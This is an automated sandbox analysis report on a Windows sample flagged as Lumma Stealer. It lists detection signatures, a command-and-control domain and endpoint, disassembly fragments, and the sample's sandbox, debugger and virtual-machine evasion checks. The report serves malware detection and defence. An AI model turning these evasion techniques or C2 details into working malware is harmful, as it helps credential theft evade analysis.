Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561211
MD5:8d5f9df92d2fb9c40125d06c7e3c66be
SHA1:0e90f85e420a9231cefbf51d9cf6f9dddfb42aa7
SHA256:32ffca83244f63bde5db2ae85aa691a68a2725199ffc4abbcbdab29b9fda8707
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7044 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8D5F9DF92D2FB9C40125D06C7E3C66BE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-22T22:39:00.940600+010020283713Unknown Traffic192.168.2.449730104.21.93.105443TCP
2024-11-22T22:39:03.182137+010020283713Unknown Traffic192.168.2.449731104.21.93.105443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-22T22:39:01.897959+010020546531A Network Trojan was detected192.168.2.449730104.21.93.105443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-22T22:39:01.897959+010020498361A Network Trojan was detected192.168.2.449730104.21.93.105443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: file.exeAvira: detected
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exeJoe Sandbox ML: detected
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], bl0_2_0014CF05
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax0_2_0014C02B
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh0_2_0017C040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh0_2_0017C040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h0_2_0017C040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh0_2_0017C040
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00160870
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_0017B860
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_0017F8D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax0_2_0017F8D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h]0_2_0014E0D8
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+14h]0_2_001498F0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax0_2_0017B8E0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_0017B8E0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+14h]0_2_0014E970
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], cx0_2_0014EA38
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]0_2_0014E35B
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp0_2_00145C90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp0_2_00145C90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_0014BC9D
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00168CB0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h0_2_0017BCE0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]0_2_0014AD00
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [edi]0_2_00165E90
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch]0_2_00180F60
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h]0_2_001477D0
Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax0_2_001477D0

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.93.105:443
Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.93.105:443
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.93.105:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.93.105:443
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tail-cease.cyou
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: tail-cease.cyou
Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tail-cease.cyou
Source: file.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tail-cease.cyou/
Source: file.exe, 00000000.00000003.1742300907.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742626357.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743661055.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743519317.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tail-cease.cyou/api
Source: file.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tail-cease.cyou/b
Source: file.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tail-cease.cyou/d
Source: file.exe, 00000000.00000003.1742300907.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743519317.0000000000B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tail-cease.cyou:443/apia/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

barindex
PE file contains section with special chars
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001790300_2_00179030
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001489A00_2_001489A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014CF050_2_0014CF05
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002488250_2_00248825
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001468400_2_00146840
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017C0400_2_0017C040
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001608700_2_00160870
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002138A90_2_002138A9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017F8D00_2_0017F8D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014E0D80_2_0014E0D8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003130EC0_2_003130EC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001498F00_2_001498F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017B8E00_2_0017B8E0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003180C90_2_003180C9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014E9700_2_0014E970
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002BA9420_2_002BA942
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030A99C0_2_0030A99C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001461A00_2_001461A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001741D00_2_001741D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031D1EF0_2_0031D1EF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001492100_2_00149210
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014B2100_2_0014B210
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00260A410_2_00260A41
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144AC00_2_00144AC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00145AC90_2_00145AC9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015DB300_2_0015DB30
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030FB010_2_0030FB01
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00319B6B0_2_00319B6B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015FB600_2_0015FB60
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00142B800_2_00142B80
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031EC270_2_0031EC27
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014542C0_2_0014542C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002DCC170_2_002DCC17
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C84670_2_002C8467
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00145C900_2_00145C90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00180C800_2_00180C80
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00168CB00_2_00168CB0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00307C9C0_2_00307C9C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001494D00_2_001494D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00146CC00_2_00146CC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001724E00_2_001724E0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014AD000_2_0014AD00
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001595300_2_00159530
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00163D700_2_00163D70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001435800_2_00143580
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001815800_2_00181580
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00167E200_2_00167E20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001606500_2_00160650
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003166780_2_00316678
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00165E900_2_00165E90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030DEEB0_2_0030DEEB
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00322ED70_2_00322ED7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002C6ECB0_2_002C6ECB
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001AAF0E0_2_001AAF0E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001687700_2_00168770
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00180F600_2_00180F60
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001617900_2_00161790
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0017C7800_2_0017C780
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001787B00_2_001787B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002DB7970_2_002DB797
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001477D00_2_001477D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001427D00_2_001427D0
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exeStatic PE information: Section: ZLIB complexity 0.9991995389344263
Source: file.exeStatic PE information: Section: jobzmdtd ZLIB complexity 0.9945954464550578
Source: classification engineClassification label: mal100.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001727B0 CoCreateInstance,0_2_001727B0
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: file.exeStatic file information: File size 1897984 > 1048576
Source: file.exeStatic PE information: Raw size of jobzmdtd is bigger than: 0x100000 < 0x1a5600

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.140000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jobzmdtd:EW;izjuqqoh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jobzmdtd:EW;izjuqqoh:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: file.exeStatic PE information: real checksum: 0x1d0a2b should be: 0x1d983c
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: jobzmdtd
Source: file.exeStatic PE information: section name: izjuqqoh
Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00248825 push edi; mov dword ptr [esp], 0B9C1352h0_2_0024885B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00248825 push ebp; mov dword ptr [esp], 55457955h0_2_00248884
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00248825 push eax; mov dword ptr [esp], 0A16D3D5h0_2_002488A2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00248825 push 310D8D53h; mov dword ptr [esp], edi0_2_002488EF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00248825 push 0ACAE305h; mov dword ptr [esp], edi0_2_00248964
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00248825 push 553FABF6h; mov dword ptr [esp], eax0_2_002489B2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00248825 push 73B1DA0Bh; mov dword ptr [esp], eax0_2_00248A08
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00248825 push edi; mov dword ptr [esp], ecx0_2_00248A23
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D5826 push 2E0EBA84h; mov dword ptr [esp], ebx0_2_003D5967
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039D01E push ebp; mov dword ptr [esp], edx0_2_0039D064
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039D01E push 11578C51h; mov dword ptr [esp], ebx0_2_0039D0D8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00396015 push 656A7BFAh; mov dword ptr [esp], ebp0_2_00396040
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032681C push esi; mov dword ptr [esp], edx0_2_00326841
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032681C push esi; mov dword ptr [esp], esp0_2_00326845
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00158028 push esp; ret 0_2_0015802B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00155057 push eax; iretd 0_2_00155058
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C7878 push 26E8A99Eh; mov dword ptr [esp], ebp0_2_003C78C1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00376063 push ebx; mov dword ptr [esp], edi0_2_00376067
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003CF053 push ebx; mov dword ptr [esp], ebp0_2_003CF070
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003EF0BB push 719DCBC3h; mov dword ptr [esp], edx0_2_003EF0E4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003EF0BB push 13267B02h; mov dword ptr [esp], edi0_2_003EF101
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002138A9 push 5D41F02Dh; mov dword ptr [esp], ebp0_2_002138C7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002138A9 push 6770AB66h; mov dword ptr [esp], ebp0_2_002138E3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002138A9 push 206817A2h; mov dword ptr [esp], esi0_2_00213901
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002138A9 push eax; mov dword ptr [esp], edx0_2_00213980
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BE0A5 push 32211F65h; mov dword ptr [esp], edi0_2_003BE0F9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1097 push 3C122AC2h; mov dword ptr [esp], eax0_2_003B10D8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038F0EE push eax; mov dword ptr [esp], ebp0_2_0038F161
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003130EC push esi; mov dword ptr [esp], edi0_2_0031312A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003130EC push ecx; mov dword ptr [esp], ebx0_2_0031312E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003130EC push eax; mov dword ptr [esp], edx0_2_0031314D
Source: file.exeStatic PE information: section name: entropy: 7.97509167370507
Source: file.exeStatic PE information: section name: jobzmdtd entropy: 7.954231338425638

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 19D099 second address: 19D09F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 19D09F second address: 19D0A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32633E second address: 326346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3268A9 second address: 3268D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5210h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F27492B5216h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 326A3B second address: 326A41 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 326A41 second address: 326A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F27492B5219h 0x0000000e jmp 00007F27492B5210h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 326A73 second address: 326A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 326A79 second address: 326A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 326A7D second address: 326A83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A04C second address: 32A051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A166 second address: 32A189 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F2749204C34h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A189 second address: 32A18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A18E second address: 32A1DF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2749204C3Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jns 00007F2749204C30h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 jmp 00007F2749204C39h 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A2E6 second address: 32A2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A2EA second address: 32A2F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 32A2F0 second address: 32A32C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F27492B5206h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jg 00007F27492B5221h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 jp 00007F27492B520Eh 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
